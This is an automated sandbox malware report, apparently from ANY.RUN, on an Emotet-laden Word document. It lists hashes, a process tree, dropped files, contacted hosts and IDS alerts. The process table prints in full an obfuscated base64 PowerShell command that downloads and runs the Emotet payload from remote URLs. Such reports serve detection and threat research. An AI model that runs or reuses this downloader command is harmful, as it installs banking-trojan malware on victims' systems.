File name: | vir1.doc |
Full analysis: | https://app.any.run/tasks/0b99dc61-796d-4913-9f1b-c1b7c6d47b25 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 30, 2020, 06:40:01 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Odio., Author: Lou Denis, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 29 23:29:00 2020, Last Saved Time/Date: Tue Sep 29 23:29:00 2020, Number of Pages: 1, Number of Words: 3749, Number of Characters: 21371, Security: 8 |
MD5: | 7D23CB8063CCD89D7CE68FB639696051 |
SHA1: | EE908749853CC32C6C979463B0F875BB4CFB7EB2 |
SHA256: | F8B2D066F5A3D657EDB1544F9DF31A9A7B3121C5C14DDB1B96B50DDD69B44C22 |
SSDEEP: | 1536:hMRD3bNqfNpu39IId5a6XP3Mg8af2qD9ieW0jnzJ:CR1qf69xak3Mgx2gVjnzJ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
LocaleIndicator: | 1033 |
CodePage: | Unicode UTF-16, little endian |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 15 |
CharCountWithSpaces: | 25070 |
Paragraphs: | 50 |
Lines: | 178 |
Company: | - |
Security: | Locked for annotations |
Characters: | 21371 |
Words: | 3749 |
Pages: | 1 |
ModifyDate: | 2020:09:29 22:29:00 |
CreateDate: | 2020:09:29 22:29:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Lou Denis |
Subject: | - |
Title: | Odio. |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3968 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\vir1.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3632 | POwersheLL -ENCOD JABJAGIAYQB0AGQAbwBtAD0AKAAnAE0AYwAnACsAKAAnAHoAJwArACcAbgBpACcAKQArACcAcgA1ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAdQBTAGUAUgBwAFIATwBGAGkATABFAFwAUwBzAEgATgBhAE0ASQBcAFUANwBfAEIAVQB5AGEAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIAZQBDAFQATwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBDAFUAYABSAEkAVABZAHAAYABSAG8AYABUAGAATwBjAE8ATAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAMgAnACkAKwAoACcALAAgACcAKwAnAHQAbAAnACkAKwAoACcAcwAxADEAJwArACcALAAgACcAKQArACcAdAAnACsAJwBsAHMAJwApADsAJABJAGEAegB1ADcANgBiACAAPQAgACgAKAAnAFQAJwArACcAMwA2AHYAJwApACsAKAAnAG0AJwArACcAcgA5ACcAKQArACcAbAAnACkAOwAkAFAAbAA0ADQAZwBzAHkAPQAoACgAJwBFACcAKwAnAGkANgAnACkAKwAoACcANQAnACsAJwB0AG0AJwApACsAJwBtACcAKQA7ACQAUQA3AHMAYwB6ADQAaQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwBjAEoAJwArACgAJwB1ACcAKwAnAFMAcwBoAG4AYQBtACcAKQArACcAaQBjACcAKwAoACcASgB1AFUANwAnACsAJwBfAGIAJwArACcAdQB5AGEAJwApACsAKAAnAGMASgAnACsAJwB1ACcAKQApACAALQBDAFIARQBwAGwAYQBDAEUAIAAgACgAWwBjAGgAQQByAF0AOQA5ACsAWwBjAGgAQQByAF0ANwA0ACsAWwBjAGgAQQByAF0AMQAxADcAKQAsAFsAYwBoAEEAcgBdADkAMgApACsAJABJAGEAegB1ADcANgBiACsAKAAoACcALgBlACcAKwAnAHgAJwApACsAJwBlACcAKQA7ACQASgA3ADkAeAA2AHkAbAA9ACgAKAAnAE0AawA0ACcAKwAnADUAcQAnACsAJwBoACcAKQArACcANgAnACkAOwAkAEIAZwBhAHkAbwB2AHIAPQAuACgAJwBuAGUAdwAtAG8AYgAnACsAJwBqACcAKwAnAGUAYwB0ACcAKQAgAG4ARQBUAC4AVwBFAGIAQwBsAGkARQBOAHQAOwAkAFEAMQBlAGEAbgA5AGIAPQAoACgAJwBoACcAKwAnAHQAdABwACcAKQArACcAOgAnACsAJwAvAC8AJwArACgAJwB3AHcAdwAnACsAJwAuAHAAJwArACcAcgBvAGQAJwArACcAdQBjAHQAcwBvACcAKwAnAGYAaQBuACcAKQArACgAJwBkAGkAYQAnACsAJwByAGUAJwApACsAJwB2ACcAKwAnAGkAJwArACcAZQAnACsAKAAnAHcAcwAuACcAKwAnAGMAbwAnACkAKwAoACcAbQAnACsAJwAvAGMAJwApACsAJwBzAHMAJwArACgAJwAvACcAKwAnADkAVQB0ACcAKQArACcALwAqACcAKwAoACcAaAB0ACcAKwAnAHQAcABzADoAJwApACsAKAAnAC8ALwBvACcAKwAnAG4AbABpACcAKQArACgAJwBuACcAKwAnAGUAMgAnACkAKwAoACcANABoAC4AYgAnACsAJwBpACcAKQArACgAJwB6ACcAKwAnAC8AdwBwAC0AJwApACsAKAAnAGEAZAAnACsAJwBtACcAKQArACgAJwBpACcAKwAnAG4ALwBuAC8AJwArACcAKgAnACsAJwBoAHQAdAAnACkAKwAnAHAAJwArACgAJwBzACcAKwAnADoALwAvACcAKQArACcAcwAnACsAJwB0ACcAKwAoACcAYQByAC0AJwArACcAcwBwACcAKwAnAGUAJwApACsAKAAnAGUAZAAuACcAKwAnAHYAaQBwACcAKQArACgAJwAvAHcAcAAtAGEAZAAnACsAJwBtACcAKQArACcAaQBuACcAKwAoACcALwBqACcAKwAnAHAAJwApACsAJwAvACoAJwArACcAaAB0ACcAKwAoACcAdAAnACsAJwBwAHMAOgAvAC8AawAnACsAJwBlACcAKQArACgAJwBuACcAKwAnAGgAdABoAGkAZQAnACsAJwB0AGsAZQAnACkAKwAnAC4AJwArACgAJwBjAG8AbQAvADAAJwArACcARgBnAC8AJwApACsAJwAqAGgAJwArACgAJwB0AHQAJwArACcAcABzADoAJwApACsAJwAvAC8AJwArACcAcwAnACsAKAAnAHkAbgAnACsAJwB0ACcAKQArACgAJwBlAGcAJwArACcAbwAnACkAKwAnAHcAJwArACgAJwBzAC4AYwBvACcAKwAnAG0ALwBjAGgAJwApACsAJwBpAHIAJwArACgAJwBhAGcAJwArACcALwAnACkAKwAnAEsAJwArACcAWAAvACcAKwAnACoAJwArACgAJwBoAHQAJwArACcAdABwACcAKwAnAHMAOgAvAC8AJwApACsAKAAnAHYAJwArACcAaQBzACcAKwAnAGgAYQBsAHAAJwApACsAKAAnAGEAdABvAGwAYQAnACsAJwAuAGMAbwBtACcAKwAnAC8AJwApACsAKAAnAHcAJwArACcAcAAtAGEAZABtAGkAJwArACcAbgAvADIALwAnACkAKwAoACcAKgBoAHQAdABwAHMAJwArACcAOgAnACsAJwAvAC8AJwApACsAJwBzAGgAJwArACgAJwBtACcAKwAnAGMAdAAuAG8AJwArACcAcgBnACcAKQArACcALwAnACsAJwB3ACcAKwAoACcAcAAtAGEAJwArACcAZAAnACkAKwAoACcAbQAnACsAJwBpAG4ALwAnACkAKwAoACcAWAAnACsAJwBtAC8AJwApACkALgAiAFMAcABgAEwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUwA3AHMAZAB0AGEAbAA9ACgAKAAnAEEAJwArACcAbwBjAGkAXwAnACsAJwB6ACcAKQArACcAaQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABKADUAaAB2AGQAdAA2ACAAaQBuACAAJABRADEAZQBhAG4AOQBiACkAewB0AHIAeQB7ACQAQgBnAGEAeQBvAHYAcgAuACIARABvAHcAYABOAGwAbwBgAEEAZABmAGkAYABsAGUAIgAoACQASgA1AGgAdgBkAHQANgAsACAAJABRADcAcwBjAHoANABpACkAOwAkAE4AcAAwAHYAXwB5ADQAPQAoACgAJwBaADIAJwArACcAbQAnACkAKwAnADgAMQAnACsAJwA2AHQAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAFEANwBzAGMAegA0AGkAKQAuACIATABFAE4ARwBgAFQAaAAiACAALQBnAGUAIAAzADkAMgAyADMAKQAgAHsAJgAoACcASQAnACsAJwBuACcAKwAnAHYAbwBrAGUAJwArACcALQBJAHQAZQBtACcAKQAoACQAUQA3AHMAYwB6ADQAaQApADsAJABUAGUAeAA2AGoAeABuAD0AKAAnAEoAdwAnACsAKAAnAHIAdwBkACcAKwAnAGMANAAnACkAKQA7AGIAcgBlAGEAawA7ACQASgBrAGIAagBqAGQAYgA9ACgAKAAnAE8AJwArACcAZAAzACcAKQArACcAegBvACcAKwAnADYAaAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMANQBqAHYAdgB1AGsAPQAoACcAUAAnACsAKAAnAF8AdwAnACsAJwBjACcAKQArACgAJwBtAG0AJwArACcAOAAnACkAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3832 | "C:\Users\admin\Sshnami\U7_buya\T36vmr9l.exe" | C:\Users\admin\Sshnami\U7_buya\T36vmr9l.exe | POwersheLL.exe | |
User: admin Company: Flex Inc. Integrity Level: MEDIUM Description: Replacement for the Masked Edit Control v 2.0. Exit code: 0 Version: 2.8.0.3 | ||||
3152 | "C:\Users\admin\AppData\Local\systemcpl\KBDFO.exe" | C:\Users\admin\AppData\Local\systemcpl\KBDFO.exe | T36vmr9l.exe | |
User: admin Company: Flex Inc. Integrity Level: MEDIUM Description: Replacement for the Masked Edit Control v 2.0. Version: 2.8.0.3 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRBEDC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3632 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TVEJ4FBOXIPBD2L3IRGY.temp | — | |
MD5:— | SHA256:— | |||
3832 | T36vmr9l.exe | C:\Users\admin\AppData\Local\Temp\~DF2F1F7AF9A7C5F030.TMP | — | |
MD5:— | SHA256:— | |||
3968 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\vir1.doc.LNK | lnk | |
MD5:B46FA0AD741E5054150FC0012C91AD6B | SHA256:9080AE3B131215E88D3AE4E796B52E24D5BA3AE5602B513F1D73658181BDBEB0 | |||
3968 | WINWORD.EXE | C:\Users\admin\Desktop\~$vir1.doc | pgc | |
MD5:AD0A0293B6BDCFE52E47A31D50476B72 | SHA256:128C82676D7C2EB8AEAC8013448E8027260F4E25C8AFCB62E334E5D5497CFBFD | |||
3832 | T36vmr9l.exe | C:\Users\admin\AppData\Local\systemcpl\KBDFO.exe | executable | |
MD5:6B150B90D11ECED71CCCC6FADEC39D43 | SHA256:93B60CF27B25A6867C5F01CA9355335B8AC4ECC2260982A50714CD12C47A5D09 | |||
3968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:1998C7ECDE025FB74624480B97A70378 | SHA256:13D34FE24069C286B32B8BE371334A48AC41738C8E1D06FEF2DFD88C3A63E466 | |||
3632 | POwersheLL.exe | C:\Users\admin\Sshnami\U7_buya\T36vmr9l.exe | executable | |
MD5:6B150B90D11ECED71CCCC6FADEC39D43 | SHA256:93B60CF27B25A6867C5F01CA9355335B8AC4ECC2260982A50714CD12C47A5D09 | |||
3968 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:7BC094E9C2435B309D9E12BE4843CADE | SHA256:A84E8C2C72D30FE1089DE35B13437C0771EA4BE856662EA8D15A1B0C63F61E3E | |||
3968 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:398DE326941A5E8BA1AEB90ACBF3AD12 | SHA256:AC1D7DBA2E79145B861969922D7A785C40B5C31CDD08DE705DBC8FBA1AAC666B |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3632 | POwersheLL.exe | 68.66.228.11:80 | www.productsofindiareviews.com | A2 Hosting, Inc. | US | suspicious |
3152 | KBDFO.exe | 202.22.141.45:80 | — | OFFRATEL | NC | malicious |
Domain | IP | Reputation |
---|---|---|
www.productsofindiareviews.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3632 | POwersheLL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3632 | POwersheLL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3632 | POwersheLL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3152 | KBDFO.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M10 |